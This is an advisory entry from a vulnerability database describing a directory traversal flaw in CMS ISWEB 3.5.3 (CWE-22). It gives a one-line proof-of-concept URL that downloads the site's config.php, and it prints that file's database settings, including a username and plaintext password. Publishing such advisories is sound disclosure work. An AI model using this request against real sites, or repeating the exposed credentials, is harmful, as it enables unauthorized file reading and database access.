CMS ISWEB 3.5.3 Directory Traversal

2018.08.06
Credit: Thiago Sena
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal # Date: 2018-08-01 # Exploit Author: Thiago "thxsena" Sena # Vendor Homepage: http://www.isweb.it # Version: 3.5.3 # Tested on: Linux # CVE : N/A # PoC: # CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download, # as demonstrated by moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php # Download and open it. $dati_db = array( 'tipo' => 'mysql', 'host' => 'localhost', 'user' => 'networkis', 'password' => 'guybrush77', 'database' => 'networkis', 'database_offline' => '', 'persistenza' => FALSE, 'prefisso' => '', 'like' => 'LIKE' );


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top